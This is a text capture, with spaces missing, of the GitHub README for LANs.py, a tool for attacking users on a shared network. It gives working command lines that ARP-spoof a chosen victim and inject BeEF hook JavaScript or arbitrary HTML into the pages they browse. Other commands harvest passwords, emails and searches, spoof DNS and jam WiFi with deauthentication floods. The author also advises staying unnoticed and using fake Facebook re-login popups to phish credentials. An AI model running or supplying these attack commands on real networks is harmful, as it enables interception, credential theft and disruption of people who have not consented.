4/11/2015

DanMcInerney/LANs.py GitHub

Thisrepository

Explore

Search

Features

Enterprise

DanMcInerney / LANs.py

Blog

Watch

Signup

121

Star

1,326

Signin

Fork

164

Injectcode,jamwifi,andspyonwifiusers
Code
165commits

branch:master

1branch

0releases

12contributors

LANs.py/

Issues

Pullrequests

UpdateREADME.md
DanMcInerneyauthoredonMar4

latestcommit5a17c83146

.gitignore

betterinterfacedetectionifnotspecified

5monthsago

LANs.py

cleanedupthecode

2monthsago

LICENSE

changedtoGPL

5monthsago

README.md

UpdateREADME.md

requirements.txt

addedrequirements.txt

amonthago
3monthsago

README.md

Pulse
Graphs

HTTPScloneURL

https://github.com/Da
nMcInerney/LA

YoucanclonewithHTTPSor
Subversion.

DownloadZIP

IfyouhaveanyissuesrunningthisscriptI'dsuggestcheckingoutMITMfwhichdoesallthesame
things+more.Eventuallythisscriptneedstoberewrittenwithnetcredsastheengine.

LANs.py
AutomaticallyfindthemostactiveWLANusersthenspyononeofthemand/orinjectarbitrary
HTML/JSintopagestheyvisit.
IndividuallypoisonstheARPtablesofthetargetbox,therouterandtheDNSserverif
necessary.Doesnotpoisonanyoneelseonthenetwork.Displaysallmosttheinterestingbits
oftheirtrafficandcaninjectcustomhtmlintopagestheyvisit.Cleansupafteritself.
AlsocanbeusedtocontinuouslyjamnearbyWiFinetworks.Thishasanapproximaterangeofa
1blockradius,butthiscanvarybasedoffofthestrengthofyourWiFicard.Thiscanbefinetuned
toallowjammingofeveryoneorevenjustoneclient.CannotjamWiFiandspysimultaneously.
Prerequisites:Linux,pythonscapy,pythonnfqueue(nfqueuebindings0.43),aircrackng,python
twisted,BeEF(optional),nmap,nbtscan,tcpdump,andawirelesscardcapableofpromiscuousmode
ifyoudon'tknowtheIPofyourtarget.
TestedonKali.Inthefollowingexamples192.168.0.5willbetheattackingmachineand192.168.0.10
willbethevictim.
Alloptions:
PythonLANs.py[h][bBEEF][cCODE][u][ipIPADDRESS][vmacVICTIMMAC]
[d][v][dnsDNSSPOOF][a][set][p][na][n]
[iINTERFACE][rREDIRECTTO][ripROUTERIP]
[rmacROUTERMAC][pcapPCAP][sSKIP][chCHANNEL]
[mMAXIMUM][no][tTIMEINTERVAL][packetsPACKETS]
[directedonly][accesspointACCESSPOINT]

https://github.com/DanMcInerney/LANs.py

1/5

4/11/2015

DanMcInerney/LANs.py GitHub

Usage
Commonusage:
pythonLANs.pyup

ActivetargetidentificationwhichARPspoofsthechosentargetandoutputsalltheinterestingnon
HTTPSdatatheysendorrequest.There'snoipoptionsothiswillARPscanthenetwork,compareit
toaliverunningpromiscuouscapture,andlistalltheclientsonthenetwork.Attemptstotagthe
targetswithaWindowsnetbiosnameandprintshowmanydatapacketstheyaresending/receiving.
Theabilitytocapturedatapacketstheysendisverydependentonphysicalproximityandthepowerof
yournetworkcard.CtrlCwhenyou'rereadyandpickyourtargetwhichitwillthenARPspoof.
Supportsinterceptionandharvestingofdatafromthefollowingprotocols:HTTP,FTP,IMAP,POP3,
IRC.Willprintthefirst135charactersofURLsvisitedandignoreURLsendingin.jpg,.jpeg,.gif,.css,
.ico,.js,.svg,and.woff.Willalsoprintallprotocolusername/passwordsentered,searchesmadeon
anysite,emailssent/received,andIRCmessagessent/received.Screenshot:
http://i.imgur.com/kQofTYP.png
RunningLANs.pywithoutargumentwillgiveyouthelistofactivetargetsanduponselectingone,itwill
actasasimpleARPspoofer.

Anothercommonusage:
pythonLANs.pyupdip192.168.0.10

d:openanxtermwithdriftnettoseeallimagestheyview
ip:targetthisIPaddressandskiptheactivetargetingatthebeginning

HTMLinjection:
pythonLANs.pybhttp://192.168.0.5:3000/hook.js

InjectaBeEFhookURL(http://beefproject.com/,tutorial:http://resources.infosecinstitute.com/beef
part1/)intopagesthevictimvisits.Thisjustwrapstheargumentin
<script>
tagssoyoucanreally
enteranylocationofajavascriptfile.Attemptstoinsertitafterthefirsttagfoundinthepage'sHTML.
pythonLANs.pyc'<title>Owned.</title>'

InjectarbitraryHTMLintopagesthevictimvisits.Firsttriestoinjectitafterthefirst
<head>
tagand
failingthat,injectspriortothefirst
</head>
tag.Thisexamplewillchangethepagetitleto'Owned.'

Readfrompcap:
pythonLANs.pypcaplibpcapfilenameip192.168.0.10

Toreadfromapcapfileyoumustincludethetarget'sIPaddresswiththeipoption.Itmustalsobein
https://github.com/DanMcInerney/LANs.py

2/5

4/11/2015

DanMcInerney/LANs.py GitHub

libpcapformwhichisthemostcommonanyway.Oneadvantageofreadingfromapcapfileisthatyou
donotneedtoberoottoexecutethescript.

DNSspoofing
pythonLANs.pyar80.87.128.67

pythonLANs.pydnseff.org

Example1:TheaoptionwillspoofeverysingleDNSrequestthevictimmakesandwhenusedin
conjuctionwithritwillredirectthemtor'sargumentaddress.Thevictimwillberedirectedto
stallman.org(80.87.128.67)nomatterwhattheytypeintheaddressbar.
Example2:Thiswillspoofthedomaineff.organdsubdomainsofeff.org.Whenthereisnorargument
presentwiththeaordnsargumentsthescriptwilldefaulttosendingthevictimtotheattacker'sIP
address.Ifthevictimtriestogotoeff.orgtheywillberedirectedtotheattacker'sIP.

Mostaggressiveusage:

pythonLANs.pyvdpnnasetar80.87.128.67c'<title>Owned.</title>'bhttp://192.168.0.5:3000/hook.jsip1

JamallWiFinetworks:
pythonLANs.pyjam

Jamjustoneaccesspoint(router)
pythonLans.pyjamaccesspoint01:MA:C0:AD:DY

Alloptions:
NormalUsage:
bBEEF_HOOK_URL:copytheBeEFhookURLtoinjectitintoeverypagethevictimvisits,eg:b
http://192.168.1.10:3000/hook.js
c'HTMLCODE':injectarbitraryHTMLcodeintopagesthevictimvisitsincludethequoteswhen
selectingHTMLtoinject
d:openanxtermwithdriftnettoseeallimagestheyview
dnsDOMAIN:spooftheDNSofDOMAIN.e.g.dnsfacebook.comwillDNSspoofeveryDNS
requesttofacebook.comorsubdomain.facebook.com
a:SpoofeveryDNSresponsethevictimmakes,effectivelycreatingacaptiveportalpager
optioncanbeusedwiththis
rIPADDRESS:onlytobeusedwiththednsDOMAINoptionredirecttheusertothis
IPADDRESSwhentheyvisitDOMAIN
u:printsURLsvisitedtruncatesat150charactersandfiltersimage/css/js/woff/svgurlssincethey
spamtheoutputandareuninteresting
iINTERFACE:specifyinterfacedefaultisfirstinterfacein
iproute
,eg:iwlan0
ip:targetthisIPaddress
n:performsaquicknmapscanofthetarget
https://github.com/DanMcInerney/LANs.py

3/5

4/11/2015

DanMcInerney/LANs.py GitHub

na:performsanaggressivenmapscaninthebackgroundandoutputsto[victimIP
address].nmap.txt
p:printusername/passwordsforFTP/IMAP/POP/IRC/HTTP,HTTPPOSTsmade,allsearches
made,incoming/outgoingemails,andIRCmessagessent/received
pcapPCAP_FILE:parsethroughallthepacketsinapcapfilerequirestheip[target'sIP
address]argument
rmacROUTER_MAC:enterrouterMAChereifyou'rehavingtroublegettingthescriptto
automaticallyfetchit
ripROUTER_IP:enterrouterIPhereifyou'rehavingtroublegettingthescripttoautomatically
fetchit
v:showverboseURLswhichdonottruncateat150characterslikeu
jam:jamallorsome2.4GHzwirelessaccesspointsandclientsinrangeuseargumentsbelow
inconjunctionwiththisargumentifnecessary
WifiJamming:
sMAC_Address_to_skip:SpecifyaMACaddresstoskipdeauthing.Example:s
00:11:BB:33:44:AA
chCHANNEL:Limitwifijammertosinglechannel
mMAXIMUM:Maximumnumberofclientstodeauth.Useifmovingaroundsoastoprevent
deauthingclient/APpairsoutsideofcurrentrange.
no:Donotclearthedeauthlistwhenthemaximum(m)numberofclient/APcombosisreached.
Mustbeusedinconjunctionwithm.Example:m10n
tTIME_INTERVAL:Timebetweeneachdeauthpacket.Defaultismaximum.Ifyouseescapy
errorslike'nobufferspace'try:t.00001
packetsNUMBER:Numberofpacketstosendineachdeauthburst.Defaultis1packet.
directedonly:Don'tsenddeauthpacketstothebroadcastaddressofAPsandonlysendto
client/APpairs
accesspointROUTER_MAC:EntertheMACaddressofaspecificAPtotarget.

Cleanup
UponreceivingaCtrlC:
TurnsoffIPforwarding
Flushesiptablesfirewall
Individuallyrestorestherouterandvictim'sARPtables

Technicaldetails
ThisscriptusesapythonnfqueuebindingsqueuewrappedinaTwistedIReadDescriptortofeed
packetstocallbackfunctions.nfqueuebindingsisusedtodropandforwardcertainpackets.Python's
scapylibrarydoestheworktoparseandinjectpackets.
Injectingcodeundetectedisadiceygame,ifaminorthinggoeswrongortheserverthevictimis
requestingdatafromperformsthingsinuniqueorrarewaythentheuserwon'tbeabletoopenthe
pagethey'retryingtoviewandthey'llknowsomething'sup.Thisscriptisdesignedtoforwardpackets
ifanythingfailssoduringusageyoumayseelotsof"[!]Injectedpacketforwww.domain.com"butonly
seeoneortwodomainsontheBEeFpanelthatthebrowserishookedon.ThisisOK.Iftheydon'tget
hookedonthefirstpagejustwaitforthemtobrowseafewotherpages.Thegoalistobe
unnoticeable.MyfavoriteBEeFtoolsareinCommands>SocialEngineering.Dothingslikecreatean
officiallookingFacebookpopupsayingtheuser'sauthenticationexpiredandtoreentertheir
https://github.com/DanMcInerney/LANs.py

4/5

4/11/2015

DanMcInerney/LANs.py GitHub

credentials.

danmcinerney.org
analytics GA

2015GitHub,Inc. Terms Privacy Security Contact

https://github.com/DanMcInerney/LANs.py

Status API Training Shop Blog About

5/5